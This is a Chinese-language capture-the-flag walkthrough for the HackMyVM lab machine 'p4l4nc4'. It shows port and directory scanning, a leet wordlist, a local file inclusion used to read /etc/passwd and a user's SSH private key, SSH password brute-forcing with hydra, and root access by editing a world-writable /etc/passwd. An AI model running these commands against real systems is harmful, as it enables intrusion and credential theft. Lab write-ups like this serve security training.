HackMyVM-p4l4nc4-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.199  08:00:27:42:5a:bb       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e3:9f:ef       VMware, Inc.

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.036 seconds (125.74 hosts/sec). 4 responded
❯ export ip=192.168.60.199
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.199:22
Open 192.168.60.199:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 12:41 CST
Initiating ARP Ping Scan at 12:41
Scanning 192.168.60.199 [1 port]
Completed ARP Ping Scan at 12:41, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:42
Completed Parallel DNS resolution of 1 host. at 12:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:42
Scanning 192.168.60.199 [2 ports]
Discovered open port 80/tcp on 192.168.60.199
Discovered open port 22/tcp on 192.168.60.199
Completed SYN Stealth Scan at 12:42, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.199
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-02-22 12:42:00 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:42:5A:BB (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.199
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 1432]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

有robots.txt，里面含有提示

❯ curl http://192.168.60.199/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
黑色巨角羚是黑色羚的一个亚种。在所有亚种中，它以其巨大的体型而著称，是非洲最稀有的有蹄动物之一。这个亚种是安哥拉特有的，只存在于两个地方，康甘达拉国家公园和卢安多自然保护区。2002年，在安哥拉内战结束后，人们对多种物种在安哥拉生存情况知之甚少，并且实际上担心黑色巨角羚已经灭绝。2004年1月，由安哥拉天主教大学科学研究中心Pedro vaz Pinto博士领导的小组首次获得了坎干达拉国家公园仅存牧群的第一批摄影证据，在马兰热南部确认了该人口在艰难时期战后持续存在。
目前，黑色巨角羚被认为是安哥拉的国家象征，对安哥尔人民来说是骄傲之源。作为证明，安哥尔足球队被称为“黑角斑马”，而安哥尔航空公司TAAG将这种羊鹿作为标志。Palanca也是安哥拉首都罗安达城市其中一个分区的名称。在非洲神话中, 像其他羊鹿一样, 它们象征着活力、速度、美丽和视觉清晰度.

直接按照原文搜一下，发现来自维基百科

Leet

这里你可以猜一下，根据靶机名字p4l4nc4

可以了解到替换式密码或者叫leet

a可以改成4，e改成3

所以利用cewl生成字典后，处理一下单词

---

你也可以引用一下来自Analogman的脚本

#!/bin/bash

# Verify that a file was provided as an argument.
if [ "$#" -ne 1 ]; then
    echo "Use: $0 dic.txt"
    exit 1
fi

# Input/output files
file_input="$1"
file_output="dic_1337.txt"

# Transformations in basic 1337 format using sed tool
sed -e 's/a/4/g' \
    -e 's/e/3/g' \
    -e 's/i/1/g' \
    -e 's/l/1/g' \
    -e 's/o/0/g' \
    -e 's/s/5/g' \
    -e 's/t/7/g' \

    "$file_input" > temp_1337.txt
    
#Merge original and transformed words, removing duplicates and unnecessary capital letters:

cat "$file_input" temp_1337.txt | tr '[:upper:]' '[:lower:]'| sort | uniq > "$file_output"

#Clean temp file
rm temp_1337.txt

#Show success

echo "The dictionary in 1337 format was saved in: $file_output"

---

再次扫描目录

❯ cewl -w dic.txt http://192.168.60.199/robots.txt
❯ cat dic.txt|grep -P '\w+' -o|sort|uniq|sed -re 's/e/3/gi' -e 's/a/4/gi' -re 's/i|l/1/gi'|tr A-Z a-z > tmp1
❯ gobuster dir -u http://$ip -w tmp1 -x php,html,zip,txt,png,jpg,webp -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.199
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                tmp1
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,png,jpg,webp,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4                (Status: 301) [Size: 316] [--> http://192.168.60.199/n3gr4/]
/n3gr4                (Status: 301) [Size: 316] [--> http://192.168.60.199/n3gr4/]
Progress: 1056 / 1064 (99.25%)
===============================================================
Finished
===============================================================

二级目录扫描，得到一个/m414nj3.php

❯ gobuster dir -u http://$ip/n3gr4 -w tmp1 -x php,html,zip,txt,png,jpg,webp -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.199/n3gr4
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                tmp1
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,jpg,webp,php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php          (Status: 500) [Size: 0]
Progress: 1056 / 1064 (99.25%)
===============================================================
Finished
===============================================================

LFI

访问后不过返回值500

模糊测试一下，是否含有LFI漏洞

❯ wfuzz -c -u "http://$ip/n3gr4/m414nj3.php?FUZZ=../../../../ect/passwd" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.199/n3gr4/m414nj3.php?FUZZ=../../../../ect/passwd
Total requests: 26584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000064:   200        0 L      0 W        0 Ch        "page"

参数page返回200

❯ curl http://192.168.60.199//n3gr4/m414nj3.php\?page\=../../../../etc/passwd |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   100  1066  100  1066    0     0   437k      0 --:--:-- --:--:-- --:--:--  520k
root:x:0:0:root:/root:/bin/bash
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash

利用一下，得到私钥文件

❯ curl http://192.168.60.199//n3gr4/m414nj3.php\?page\=../../../../home/p4l4nc4/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCvTRnNli
2HLc7wYB9S1mbCAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCrXZ98DYMr
n/f74/g82lqDkMHkyocXGXn8VaP/N7vD9j5mLSr1uhKGBbxcVm4uGP9k//mmRKlewRl/MZ
nTg0N8MP9vp0O2B9vrwHLz9JekTblv93/VCDpJS78CGkNNOVMRcv2ZB3w7uFm6zxRZxQmH
5HaRNuf795GQSFjybiqmN7Mu78bG/94aQMZZLALYmoyMCYWXGvvHpxRN1dwNsT7If4aNBE
l1HXVrZY1biDOrpJQ7O+eZpD4IKs5/QgKL6w9nBczVcGKkvyms98A5qTa/F43+1CxQE2ng
wPiejJEeJZ0PEkQu3nZTK1k7WpJzVnhpqbHGlwKWbfvMKh27Y2gpAAADwI6Nr+vLoXaEJy
SIRrVjIYFz/C3B17pmpx+lmupFfU6ruVHLE92gweyr9wAd5lxhKX1I6BClhlEoDWkzEBCT
H/4zg2tj84+hzhdVWUy6KaCVbRbuvJYWQNWY4kgfk/3FTnSJFHd+k8CZImN3Xa/9DRVLmg
jytzseFr83bPyOyGSze51kJX4r2ljurDvmcnXfQ4j27zUUmwEKi02VvjLngXbmMnIMDLI3
x/pdFxnyZ0w6wnl/Bg+2gvc54Y2ssMblNMw6HZU4K2TN/c3li3A3hLZsN7QwNIV76X5UeP
dWCOngRsImAmMtyxPKZ0rvYwgDimWunQPy0yJXEPdofL6hrAxFZ6y+jnm+gM7x1fnooSkb
9H5RblfwiOtuTD7bmAu6ApNU0Ul3X2YFPnDLFjo/D0Sj5LcsYDQ+XlTNUwnjHpyMy5VzUz
2vDpiscBd7FpFCHf1lS9bfGMLbhOfdM6TPzpjlOmdRizoVjGCZdXsA4Jg05FpvEFa3KHqM
iJOA9yXhHPROYmOwl5Mu+NTPc+Xbiu7B8TJu/BORoOShhbm7+kQpXM7XHPDKTTnJo+qmsI
Pt9FuQF3wZWIXZ48DmRKJKhB+a9LwuE8ES3wUTVqx/EbAs08V6/uiBYZmorJFSgbPd68AE
xKTK9ObilJKSfS2Ik5/iVIBTUxlAt2foAUpWTlXVNmFfBEhRSk48E8NhcgNqctKWpjKf0R
2gi/Dvpect4LoqKPue5zvN0dNlYSiq/6QK6NqJrJdN7DvsvocL+BcWmmv31erlJOo6A3Zw
CEpmnqVzMTroZSBQv3eEsOFS/+RkJ5ffFRpXGfWPh4Dn/Y++n3wbHNNb97pOd9WV+IlhDV
7btvga8cG9xp3zihOIf308VowcpIp0CSlEqZDBpis5jWY9J3N1+uh3pJHFgqmLxKnqLmzu
u15Kh/+nAV6DTBVxrdhq8HoLAvb7ubAq2ICHALC39X12+J0cLOUMi8UWYawMTFgYnO3ZBD
fb6fZaM9Hr97jREiUEG6vgIcNgn6jtJ3EM3ncxTKe2T8SSYn8pFy9Lqf+lvZ8yo9DkaPl5
ORSVWa+jCKhuClPZY5t8VJC9xXGyz8Wah15Y2pg95nGEub7dgmRlQAIiSxjWsDmaDzIBPo
IkZ5lzxoTvvtL2N1+4ZFprPwUN6y6C6zrXbzQp7Ov0bZc2g9fFiNxu1HvR96rwVNFHbeia
OJEM2NZSUU52PExgYtSXwO5aDy70oKiu0pbifoYOm19hlYwYWOOa6s+oW2FG+aXO8WIeEa
muaZDiXw==
-----END OPENSSH PRIVATE KEY-----

尝试连接一下，发现还是需要密码，猜测可能.ssh权限给的太多了

用户提权

尝试爆破ssh，得到密码friendster

❯ hydra -l p4l4nc4 -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-22 13:52:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.199:22/
[STATUS] 230.00 tries/min, 230 tries in 00:01h, 14344176 to do in 1039:26h, 9 active
[STATUS] 173.67 tries/min, 521 tries in 00:03h, 14343885 to do in 1376:35h, 9 active
[22][ssh] host: 192.168.60.199   login: p4l4nc4   password: friendster
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-22 13:55:44

连接一下，其实user可以在上面的LFI也可以读到

❯ ssh p4l4nc4@$ip
[email protected]'s password:
Linux 4ng014 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 13 17:10:08 2024 from 192.168.1.78
p4l4nc4@4ng014:~$ cat user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}

Root提权

通过搜寻可以发现/etc/passwd权限是666

直接改文件，将root后面的x删掉即可

p4l4nc4@4ng014:/tmp$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 1066 Nov 13 12:28 /etc/passwd
p4l4nc4@4ng014:/tmp$ vi /etc/passwd
p4l4nc4@4ng014:/tmp$ su root
root@4ng014:/tmp# cat /root/root.txt
HMV{4c3b9d0468240fbd4a9148c8559600fe2f9ad727}